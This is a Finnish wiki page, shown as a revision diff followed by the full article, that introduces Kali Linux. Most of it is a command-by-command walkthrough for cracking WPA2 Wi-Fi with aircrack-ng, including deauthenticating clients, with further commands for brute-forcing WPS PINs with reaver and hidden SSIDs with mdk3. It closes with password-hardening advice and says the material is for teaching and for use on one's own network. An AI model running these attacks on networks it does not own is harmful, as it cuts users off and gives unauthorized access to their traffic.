Mainos / Advertisement:

Ero sivun ”Kali Linux” versioiden välillä

Kohteesta Taisto
Siirry navigaatioon Siirry hakuun
(Tämä versio merkittiin käännettäväksi)
(8 välissä olevaa versiota 2 käyttäjän tekeminä ei näytetä)
Rivi 34: Rivi 34:
 
Tämä paketti on WLAN verkkojen murtamiseen. Testasimme tätä omassa verkossamme, eli emme ole käyttäneet luvattomasti toisen verkkoa.
 
Tämä paketti on WLAN verkkojen murtamiseen. Testasimme tätä omassa verkossamme, eli emme ole käyttäneet luvattomasti toisen verkkoa.
  
 +
Tämän voi asentaa myös [[Aircrack-ng|Debianiin]].
  
 
<!--T:13-->
 
<!--T:13-->
Rivi 42: Rivi 43:
  
 
   <!--T:15-->
 
   <!--T:15-->
airmon-ng aloittaa wlan0
+
airmon-ng start wlan0
  
 
<!--T:16-->
 
<!--T:16-->
Rivi 62: Rivi 63:
 
<!--T:21-->
 
<!--T:21-->
 
5. Jätä nykyinen terminaali ikkuna taustalle ja avaa uusi terminaali ikkuna.  
 
5. Jätä nykyinen terminaali ikkuna taustalle ja avaa uusi terminaali ikkuna.  
 +
 +
Tällä komennolla tapetaan kaikkien WLAN tukiasemalla olevien WLAN istunto (eli heitetään ulos WIFI:stä)
  
 
   <!--T:22-->
 
   <!--T:22-->
aireplay-ng –0 2 –a 00:14:BF:E0:E8:D5 –c 4C:EB:42:59:DE:31 mon0
+
aireplay-ng --deauth 100 –a 00:14:BF:E0:E8:D5 –c 4C:EB:42:59:DE:31 mon0
  
 
<!--T:23-->
 
<!--T:23-->
Rivi 108: Rivi 111:
 
<!--T:35-->
 
<!--T:35-->
 
Tulostuu KEY FOUND: [salasanasi]
 
Tulostuu KEY FOUND: [salasanasi]
 +
 +
==== WPS Murotyökalu ====
 +
 +
WPS eli WIFI Protected Setup on siis helppokäyttöinen WLAN autentikointiin mutta myös aika heikko suojaus. Tätä emme suosittele ja tässä ohjeistetaan miten sen PIN koodin voi murtaa ja palauttaa WPA salasann. Tämä liittyy WPS:n haavoitttuvuuteen...
 +
 +
  reaver -i mon0 -b BSSID -vv
 +
 +
Odota tuloksia...
 +
 +
 +
==== SSID selville ====
 +
 +
Kuvitellaampa tilanne, jossa saat jostain langattoman tukiaseman josta et tiedä mitään. Haluaisit kuitenkin yhdistaa siihen, mutta et tiedä ssid. Ja tukiasemassa ei ole ketään yhteydessäkään
 +
 +
mdk3 wlan0 b -t 00:19:07:C4:8A:60
 +
 +
Nyt se bruteforcettaa ja koittaa selvittää kyseisen MAC-osoitteen omaavan tukiaseman SSID randomisti. Fiksua olisi toki käyttää sanalistaa, näin:
 +
 +
mdk3 wlan0 b -f /usr/share/wordlists/fasttrack.txt -t 00:19:07:C4:8A:60
  
  
Rivi 121: Rivi 143:
 
* numeroita
 
* numeroita
 
* ei ole mikään sana tai lause
 
* ei ole mikään sana tai lause
 +
  
 
== Lähteet == <!--T:39-->
 
== Lähteet == <!--T:39-->

Versio 19. kesäkuuta 2016 kello 17.09

Muut kielet:
English • ‎suomi

Kali Linux on Debianiin perustuva paketti, joka on tarkoitettu rikosteknisen tutkimiseen ja läpäisytesteihin.

Kali Linux sisältää esimerkiksi salasanan murto-ohjelman ja WLAN salauksen murtoon aircrack-ng.

Ohjeet ovat opetuskäyttöön.

Asennus

Lataa Kali Linux http://www.kali.org/downloads/, suosittelemme torrent -latausta, sillä paljon nopeampi kuin suoralataus.

Asentaminen on samankaltainen Debianin asennus

Paketit

Lista paketeista joita voit käyttää tietoturvan testauksessa. Ohjeiden ideoina on kuvastaa kuinka yksinkertaista on murtautua erilaisiin järjestelmiin ja se että pitää suojautua mahdollisimman hyvin.

HUOM! Omiin järjestelmiin murtautuminen sallittua. Luvattomat tietomurrot ovat Suomen laissa kiellettyjä!

Älä ole script kiddy

aircrack-ng

Tämä paketti on WLAN verkkojen murtamiseen. Testasimme tätä omassa verkossamme, eli emme ole käyttäneet luvattomasti toisen verkkoa.

Tämän voi asentaa myös Debianiin.

1. Avataan root terminaali

2. Määritetään langaton verkkokortti

 airmon-ng start wlan0

3. Tämä komento listaa kaikki lähialueen WLAN-verkot

 airodump-ng mon0

4. Keskitytään nyt tietylle tukiasemalle ja odotetaan että muodostaa yhteyden tukiasemalle.

 airodump-ng --bssid 08:86:30:74:22:76 -c 6 --write /root/WPAcrack mon0
  • bssid = MAC osoite tukiasemasta
  • write WPAcrack = Hakemistoon jonne kirjoitetaan -> Eli kotikansiosi juureen

5. Jätä nykyinen terminaali ikkuna taustalle ja avaa uusi terminaali ikkuna.

Tällä komennolla tapetaan kaikkien WLAN tukiasemalla olevien WLAN istunto (eli heitetään ulos WIFI:stä)

 aireplay-ng --deauth 100 –a 00:14:BF:E0:E8:D5 –c 4C:EB:42:59:DE:31 mon0
  • --deauth 100 = Katkaise yhteys 100 kertaa
  • –a 00:14:BF:E0:E8:D5 = BSSID tukiasemasta
  • –c 4C:EB:42:59:DE:31 = BSSID asiakaslaitteesta

Jos virhe

 Waiting for beacon frame (BSSID: 00:14:BF:E0:E8:D5) on channel -1
 Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch

aja komento (sammuta palvelu)

 /etc/init.d/network-manager stop

Pian tulostuu toiselle ikkunalle WPA handshake: 00:14:BF:E0:E8:D5

6. Aletaan siis se oikea murtaminen.

 aircrack-ng -a2 -b [router bssid] -w [path to wordlist] [source/*.cap]

Esimerkiksi:

 aircrack-ng –a2 –b 00:14:BF:E0:E8:D5 –w /usr/share/wordlist/* /root/Desktop/WPAcrack.cap
  • WPAcrack-01.cap = Tiedosto jossa on hash salasanasta
  • /usr/share/wordlist/* = polku salasana tiedostoon

Sitten vain odotetaan että hash on purettu.

Tulostuu KEY FOUND: [salasanasi]

WPS Murotyökalu

WPS eli WIFI Protected Setup on siis helppokäyttöinen WLAN autentikointiin mutta myös aika heikko suojaus. Tätä emme suosittele ja tässä ohjeistetaan miten sen PIN koodin voi murtaa ja palauttaa WPA salasann. Tämä liittyy WPS:n haavoitttuvuuteen...

 reaver -i mon0 -b BSSID -vv

Odota tuloksia...


SSID selville

Kuvitellaampa tilanne, jossa saat jostain langattoman tukiaseman josta et tiedä mitään. Haluaisit kuitenkin yhdistaa siihen, mutta et tiedä ssid. Ja tukiasemassa ei ole ketään yhteydessäkään

mdk3 wlan0 b -t 00:19:07:C4:8A:60

Nyt se bruteforcettaa ja koittaa selvittää kyseisen MAC-osoitteen omaavan tukiaseman SSID randomisti. Fiksua olisi toki käyttää sanalistaa, näin:

mdk3 wlan0 b -f /usr/share/wordlists/fasttrack.txt -t 00:19:07:C4:8A:60


Paranna WLAN verkkosi tietoturvaa

Salauksena ehdottomasti vähintään WPA2-PSK / WPA2-PERSONAL. Tämä kuitenkin on juuri ohjeemme mukaisesti murrettavissa.

  • käyttämällä pitkää, yli 8 merkkistä salasanaa
  • Isoja ja pieniä kirjaimia
  • erikoismerkkejä
  • numeroita
  • ei ole mikään sana tai lause


Lähteet

http://www.kali.org/

http://fi.wikipedia.org/wiki/Kali_Linux

http://null-byte.wonderhowto.com/how-to/hack-wi-fi-cracking-wpa2-psk-passwords-using-aircrack-ng-0148366/

http://sarajarvi.org/tutoriaalit-wpa-murto/

Mainos / Advertisement: